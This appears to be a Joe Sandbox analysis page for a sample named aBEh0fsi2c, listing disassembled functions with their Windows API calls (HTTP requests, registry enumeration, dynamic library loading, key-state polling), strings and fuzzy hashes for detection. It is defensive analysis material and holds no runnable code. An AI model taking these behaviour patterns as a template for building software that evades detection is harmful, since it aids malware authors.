Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0ae1c41c00d566a9374db9fb7e862348830f8d667c9491e8961e5e0526d0e5d9
Instruction ID: e05482ef70037dcf86b16d9867ee06182ba2334b41b475e405958f4079e33ff3
Opcode Fuzzy Hash: 0ae1c41c00d566a9374db9fb7e862348830f8d667c9491e8961e5e0526d0e5d9
Instruction Fuzzy Hash: 3A417C702043419FDB22EF25D884F5BBBA8AF85314F054A2DF965DB291DB70AC05CB62

Function 003DD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003DD7C5

Part of subcall function 0036784B: _memmove.LIBCMT ref: 00367899

Strings

stdcall, xrefs: 003DD847
cdecl, xrefs: 003DD81C
winapi, xrefs: 003DD836
none, xrefs: 003DD8A0

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 3d720ba13c2ead06950fa9bca23e6107782b5d8afb016cce8392d5bf25c26d10
Instruction ID: be98efb75cef753cb87222d16e5fe9b1ca5b298673fdde6da47cb4d313d6e546
Opcode Fuzzy Hash: 3d720ba13c2ead06950fa9bca23e6107782b5d8afb016cce8392d5bf25c26d10
Instruction Fuzzy Hash: BC31A172904219ABCF06EF54C8519EEB3B4FF14320B10866AE8759B7D5DB71AD05CB80

Function 003B8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003B8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003B8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 003B8F57

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

Strings

ListBox, xrefs: 003B8ED3
ComboBox, xrefs: 003B8E9E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 26cca00d123f47385d02583b5455d81908b547f69495d0f5e2a97dea0e77f0fd
Instruction ID: 14aa81787e5c9e67294c862c5543683558dc0b2aa05774aed7f5b993aa683643
Opcode Fuzzy Hash: 26cca00d123f47385d02583b5455d81908b547f69495d0f5e2a97dea0e77f0fd
Instruction Fuzzy Hash: E621F071A04104BEDB16ABB0DC85DFFB76DDF05328F108629F5219B1E1DF394909D620

Function 003D182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003D18A2
InternetCloseHandle.WININET(00000000), ref: 003D18E9

Part of subcall function 003D2483: GetLastError.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D2498
Part of subcall function 003D2483: SetEvent.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D24AD

Strings

, xrefs: 003D1893

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 1c2f5b49488b8db31302a21ecfdbf4fd285c622749a7d3c94b3b4d47e01c68eb
Instruction ID: 0f0c449ee66fbe8907d42d2ddcd652d6b99b2d19f34036058ef62bfbc914eeae
Opcode Fuzzy Hash: 1c2f5b49488b8db31302a21ecfdbf4fd285c622749a7d3c94b3b4d47e01c68eb
Instruction Fuzzy Hash: 2E217FB2500208BFEB22DB65EC85EBB76EDEB48754F10412BF8059A340DA719D0567A1

Function 003E63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003E6461
LoadLibraryW.KERNEL32(?), ref: 003E6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003E647D
DestroyWindow.USER32(?), ref: 003E6485

Strings

SysAnimate32, xrefs: 003E643C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: c03772f274167d5163ae2596e1717f3d8cf9277f9ff8ac82eda83526813f7c0b
Instruction ID: fb317abf870343457f114af52dfb8c5c8394c26f0045f6eb5f892ff9bf017f7a
Opcode Fuzzy Hash: c03772f274167d5163ae2596e1717f3d8cf9277f9ff8ac82eda83526813f7c0b
Instruction Fuzzy Hash: B721CF712002A5BFEF124F66DC82EBB37ACEB683A4F114729F910961D0D771DC419B20

Function 003C6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 003C6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C6DEF
GetStdHandle.KERNEL32(0000000C), ref: 003C6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003C6E3B

Strings

nul, xrefs: 003C6E36

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 7409460735cd26bf33f7d8aeb3199eac906570d9e2a56f6b5c616d2f8bcdc135
Instruction ID: 30b391039e59a8fc13043d970ca89f5a6c106efdb179e429ee18934f75527c23
Opcode Fuzzy Hash: 7409460735cd26bf33f7d8aeb3199eac906570d9e2a56f6b5c616d2f8bcdc135
Instruction Fuzzy Hash: 0321817560020AABDB219F29DC4AF9A77B8EF44720F204A2DFDA1DB2D0D7709D518B50

Function 003C6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 003C6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C6EBB
GetStdHandle.KERNEL32(000000F6), ref: 003C6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003C6F06

Strings

nul, xrefs: 003C6F01

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 7ffa489af9e6e48d8ade4ecfbae17347350768f53302296e93999e6b8e965151
Instruction ID: c043e5d6e257ba6fc2082a71f4bff4c5ccf993d6776bbb0caaf5121b473cb8bf
Opcode Fuzzy Hash: 7ffa489af9e6e48d8ade4ecfbae17347350768f53302296e93999e6b8e965151
Instruction Fuzzy Hash: 87218E795003059BDB219F79DD46FAA77A8AF45720F204A1EF9A0D72D0D770AC518B50

Function 003CAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003CAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003CACA8
__swprintf.LIBCMT ref: 003CACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,003EF910), ref: 003CACFF

Strings

%lu, xrefs: 003CACBB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: d5fbc7c05545ca48a98046fb25aca820cb59f7cae94ff7346f059ae67be30467
Instruction ID: e4873a8ad682445ff86aeb75af7fa36b420be692b6c8fe791f9c75f616c0758d
Opcode Fuzzy Hash: d5fbc7c05545ca48a98046fb25aca820cb59f7cae94ff7346f059ae67be30467
Instruction Fuzzy Hash: CA216030A00109AFCB11EF65C985EEE7BBCEF49714B008569F909EB252DB71EA41CB61

Function 003C1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C118E
Sleep.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C11C1

Strings

@<, xrefs: 003C119D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @<
API String ID: 2875609808-354047512
Opcode ID: e429829ce7035956cf12c8d61c3fe93485befa2c527257a0d4e03b87a4fa7202
Instruction ID: b0f1f435e29798892461cfc33c75a46dd0582fcb816632f954f9db39b3b5cb18
Opcode Fuzzy Hash: e429829ce7035956cf12c8d61c3fe93485befa2c527257a0d4e03b87a4fa7202
Instruction Fuzzy Hash: B4117C31C0061CDBCF029FA4D899BEEBB78FF0A711F054159EA40F6281CB749950DBA5

Function 003C1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003C1B19

Strings

EXISTS, xrefs: 003C1B41
KEYS, xrefs: 003C1B30
REMOVE, xrefs: 003C1B1F
APPEND, xrefs: 003C1B52

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 67b26772f1a5cc90f1f992b08946e5962a12c55c59bde5dd578da2796c072ae9
Instruction ID: 5ed369204e3c270ec8f6a3f269c52e27421baf413c813955601463ef42a3d31d
Opcode Fuzzy Hash: 67b26772f1a5cc90f1f992b08946e5962a12c55c59bde5dd578da2796c072ae9
Instruction Fuzzy Hash: 3C118B349102089FCF09EFA4D8529EEB3B4FF26304B5084A9D814AB292EB325D0ADF50

Function 003DEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003DEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 003DEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003DED6A
CloseHandle.KERNEL32(?), ref: 003DEDEB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: f1382425acec286fbba3a6d06134d2b0d3cf8566c274b4c65a4805ea34a9d1d4
Instruction ID: 80cfe6c10feeb007a31ed7f04cc7e92686aa0ef63bc83ad3f18c18e035b3df71
Opcode Fuzzy Hash: f1382425acec286fbba3a6d06134d2b0d3cf8566c274b4c65a4805ea34a9d1d4
Instruction Fuzzy Hash: F88152B16043009FD722EF18D886B2AB7E9AF59710F04891EF9559F3D2DA71AC408B51

Function 0038541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0038547B
_memcpy_s.LIBCMT ref: 003854ED
__read_nolock.LIBCMT ref: 0038554B
__filbuf.LIBCMT ref: 0038556E
_memset.LIBCMT ref: 003855B2

Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 8f25456cb4f95a7e602415a32a972dabac365bfbc413d7dc428e341e0b819b97
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: C651D731A00B05DBDF27AF79D84066E77A6AF41321F2587A9F836972D0D770DE948B40

Function 003E0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003E0183
RegCloseKey.ADVAPI32(?,?), ref: 003E01AF
RegCloseKey.ADVAPI32(00000000), ref: 003E01BC

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: b2ec9005fdafc5e3fe516cdc5df72aca0d9c214c1cda5070505050fb15c474fc
Instruction ID: b56d4c06c590a449241c291f873ab227db1fb457493e661e29cad25d081c3461
Opcode Fuzzy Hash: b2ec9005fdafc5e3fe516cdc5df72aca0d9c214c1cda5070505050fb15c474fc
Instruction Fuzzy Hash: 51515D71208244AFD716EF54C881F6AB7E9FF84314F408A2DF5958B2A2DB71ED44CB52

Function 003DD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003DD927
GetProcAddress.KERNEL32(00000000,?), ref: 003DD9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 003DD9C6
GetProcAddress.KERNEL32(00000000,?), ref: 003DDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003DDA21

Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 7e286c04e03e7b8fee20c5d81d3292f173c95ca74f4d6ec9e1e78a4ccb9c05b9
Instruction ID: dbaec1b07539e4d3ec4c016e540d148a2c7ecdd856b0ae26b8d21db4ecf69390
Opcode Fuzzy Hash: 7e286c04e03e7b8fee20c5d81d3292f173c95ca74f4d6ec9e1e78a4ccb9c05b9
Instruction Fuzzy Hash: 0C511636A00209DFCB12EFA8D4949ADB7F8EF19320B05C16AE855AB352D731AD45CF90

Function 003CE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003CE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003CE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003CE687

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003CE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003CE6B4

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 5d727495d7143fa9088d75710bb21ab8ff2ccc04ae9bf37f76524311a36a2ab5
Instruction ID: 1259f4c50b623f0d473334d96adb807cb4af9d824877be4dfa3634d63cafeb44
Opcode Fuzzy Hash: 5d727495d7143fa9088d75710bb21ab8ff2ccc04ae9bf37f76524311a36a2ab5
Instruction Fuzzy Hash: 4151FB35A00205DFCB16EF64C981AAEBBF9EF09314F1484A9E909AF365CB31ED15DB50

Function 003EA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a19c4389e071883da456547849b8c72f5ac072599b5de5d72b00046c792ebb31
Instruction ID: b68b191bb3f0d31290d6aabb6cacdf6ac0946b6811f311c64e1ab2ed785b1dc7
Opcode Fuzzy Hash: a19c4389e071883da456547849b8c72f5ac072599b5de5d72b00046c792ebb31
Instruction Fuzzy Hash: A141F9359049A4AFD722DF35CC88FE9BBA8EB09310F164365F816A72E0C770BD41DA51

Function 00362344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00362357
ScreenToClient.USER32(004257B0,?), ref: 00362374
GetAsyncKeyState.USER32(00000001), ref: 00362399
GetAsyncKeyState.USER32(00000002), ref: 003623A7

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 228b5621eaf85de4347ca92a2c2609ec985d0ba81412b12df33121f4b726866b
Instruction ID: 09c722ec55f47f616409745a836232665f062037b4718b9751b9e6d963911129
Opcode Fuzzy Hash: 228b5621eaf85de4347ca92a2c2609ec985d0ba81412b12df33121f4b726866b
Instruction Fuzzy Hash: 19418039604619FFCF278F68C844AEEBB78BB05360F21835AF829962D0C7349950DB91

Function 003B63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule
